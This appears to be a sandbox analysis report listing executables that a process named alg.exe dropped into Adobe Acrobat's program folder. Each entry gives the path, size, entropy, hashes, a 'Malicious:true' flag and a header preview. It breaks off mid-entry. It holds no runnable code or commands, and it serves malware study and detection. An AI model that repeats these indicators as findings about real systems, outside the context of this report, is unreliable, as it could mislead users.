                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1515520
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.4117805147458045
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:zGqVwCto1Gm5WgQsqjnhMgeiCl7G0nehbGZpbD:CZ1GmUTDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:58107AE475C98789781CF6EA22D33523
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:78C3F902901F90890FBB7D461E02E7BFB371AEC9
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:66BD63B57ADFF0A55E49C5D13AD4477927E6D1D529CF0FA4AA4F1D3FDC807B02
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:EB736C32EBE234063C2D00D925AD2E20477EFD951F82ABAB52CB2D227F9171B95F787DC6501B892B06242AC334771936B5D62D75C23558567BF2ABA6B4BE5050
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@....................................w..... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1253376
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.15741608264454
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:ZWBW0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ZWBW0sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:C46B1938220A486686F45B71434BB752
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:2BE914E3B9756AADCFE66B5F25E0BCDA57B20CC0
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:D84AA8C846E1D42A619D3364194276F2ECCEB5CCE5B5A60ADE98AC1FD7E7AAA5
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:D497E023F87C976A22C9611431A559A903C2FB709FE64D51C83A9858AEF80491FF0CB01249CD0E06481108FF3199D22D40FB279495445F2C6CF0CFA072A95082
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................`.......2.... .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.228508293593921
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:yf9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa0TsqjnhMgeiCl7G0nehbGZpbD:y+GtCi27mVTyT+a0XDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:6749B767140513968E0317FB3099BABF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:DB26E86F616CCDE6FCC71150970B3F7A85646EB5
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:18E32B020C7D04C34F3C148D6F62C19B36B85CE145CA6C5B739CD15835A09078
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:C9AA26FA2330CF2BBA8BFA5D0CBB8C47BDC4481139C9662A7439B2C6A77E038001BE459641D076A4F4E8B10054D6A408E4C54AEE2A74A12B479E078642420467
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@.......................................... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):3110912
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.649667847098947
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:xU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeY0Dmg27RnWGj:W2NfHOIK5Ns6qR9GD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:95A095BEFEF1EB0D1336765BD5EE7715
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:405116E1AC06F58E318AA200F066EB66DE112F73
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:D0A2D9EFAA0981EC565F9A6836FA16D0346C5439A3A01F78E76DB3E6D5B96CA1
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:6DC2A343386FD631830E24A02896CBB91438143CB4405F7D2F9D7979D71E67A80B6B208ABEF5479F261206AE0B19A248621CF1A6696CD24D9C8A21060BB81DB1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0......$0... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1588224
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.531936251957351
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:YkcWTUQcydAsqjnhMgeiCl7G0nehbGZpbD:YhKUPDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:FE00029EEBFDA8C10E7BF47B246BDEE3
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:5E72AC060C127013957468C75F058C8C84ABFC56
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:8E08BE4CB616F8B780FD3DB1C74CC81A232AC1B4BA7C2FA836AC5E3CF84260E2
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:E9A8DFC8B5768D3267DD250A9B78137CCBDBD7290648ED309BE9F6634FBAE0558DC401BDCA1D64161ADC25F31A3DCCF87AC2FDCB980CCB24C045E88E65A9B5A1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@....................................i..... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...`...@...P..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1338368
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.352663717255702
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:TfY+FUBjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:TA+qBjsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:A804AE17B15B436AA0E2271C3622CD82
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:13F05B67742D45A75EF8D64BE1A1797FC9664866
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:6D5BEE67138EF9F439DDC51716B2B69F3C1A7656B7B5C7B9265B5BC013855334
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:FECE5D8291BFE9A961A3BD7C2F5613CE77460806864A2F6D4949D3254547683108EC953032195CB2B13E703E2885D600E95F08184CD83429F39F512E0857CEB3
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@.................................................................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc...p...@...`..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1143296
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.022673123502782
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:TXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:TsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:3CC830E0BC06EB8A831A00AC2C2294F1
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:5AF62A99A1F53287846F0F55A4CFDE4C33347801
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:4C6DB89364CFFAC49CE82AF1972FD08C2A012EB1EA488234BD3E4DCE17086799
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:A93BF65FA1576A1C3F63B8AD09228B2701F6A35AC9D030BC39CF1E9402E01FC58E0DE67EB6EAA3BE3B6011058E8FABF6666FA079791847CA6710C7A49B76C5DD
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@....................................-..... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...P.......@...2..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1161728
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.047161515679695
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:t/Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:BsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:89C568572439B4BFC5D3D8248434231E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:E21B2E3D0A9E4E1DACA2F32FE81088B8AB1354EE
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:5A70C85ED14FC0837E2ACBDE3BCEBBE27FE36349BFB7E51ABA91BBC036FD2518
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:1F506DA5AFB5CF64B416FC088C238AEC6D7DFFE044C966685E61D44370B32ED10D89760E103F2C2E3B86FC083C71E7CD1CEFFA5581A21810925511DB938A3843
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@....................................;..... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...P.......@...z..............@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.499791540508108
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:rtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755KDmg27RN:rjEIa4HIEWOc5UD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:29DB7EC01038E03257BB3049B474E083
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:EB1FADCDFF9C516EFD868299F17A7C3DB2C43593
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:9704D33E11B4C0343AE1EEDF58897B59156387DA0D478677DA2B9931AE78ED99
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:27638CD722D54B46BAED7BADE215D3E981CB46294B89B7BC35E77B75775B0DCDE59E766BAE01E39F6034A96F7EEDAF8033EC73FD47E8A27183BCA9AC90F86353
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.....Q.?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999367302754471
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:1572864:+Qb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:9XhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:2F6BD7BA153FE669A832E2E9E1A03984
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:8C296859E4EEF4C19C5BC97F176C1961038897FC
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:348CA56C9854CDEB896E46C39DD13F13E092E3CE0C263049627A6B4DD5F82B42
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:8EC194D62156ADF57B7BA4A545B8649660181FC810F28F8601F5403E01C54A462C5DCC76B4296DC1C453D5435945A90D2E66E7846BF0114B9843D859EEB003C0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0............ .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1230336
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.185604940316724
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:OejVWYUA/Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:LjkY7/sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:C8D5768EFBF61890D664C96168514D3C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:E4036E64D2010C4F13271B9C6EC236B86E31E965
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:4CADB7B5DEEB5A8262AA4092FBE913DF97EC88036B9D95E62AF614206A805E23
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:3E71644F41B6BDDB488B0366C52515CEF2C59D2AD8AC9918BA468353449E08870E84AA65A8799BAD728FE5331DBA7754CD12B80D0F1320E72A24C4FDDB9DA108
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@..........................................................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...`.......P...v..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1384960
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.377819560099198
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:ixwSJhkrmZsrsqjnhMgeiCl7G0nehbGZpbD:iy+krKsfDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:41193569F99026A3412F0B99F06C3B83
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:999A40C8DFA8175861EC3921EE1813228F2D4C7C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:B05BB8D61796E076A2A0038BBDCD61CDA9415C905585149ED5D09D499E1B5311
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:2250A76E674DE8388EDA1F1373014FCC2E83376D056EBB5CFED055A19E8D565C64FB5BA201FB4F7C1428193AF2066AB12EA160D107EE89C14B3731FC5E60F77A
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@....................................l2.... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1649152
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.632748301546533
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:rHQJLIRgvsnN6sqjnhMgeiCl7G0nehbGZpbD:rHQJL34ODmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:1DED4C1F28F79001E126278A69A5A6EB
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:01A111DD826A2C69A5E8EEC4FB7DAB37BC0B29F5
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:48B80EF6F9CB0C7AF582454B3829109897FD1CBCB3477D72F1FF3D8C0558CE9A
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:6CFEEEE5D69D6FA8A9BC07A7022C8D2B6213EBD50469E01EC8560F29D9AB1D940332BECA4E6D844E8E0C33EA9E9951FDCD64F4E29CDF304FD68463B6434CF89D
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@.......................................... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):5365760
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.450972577765401
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
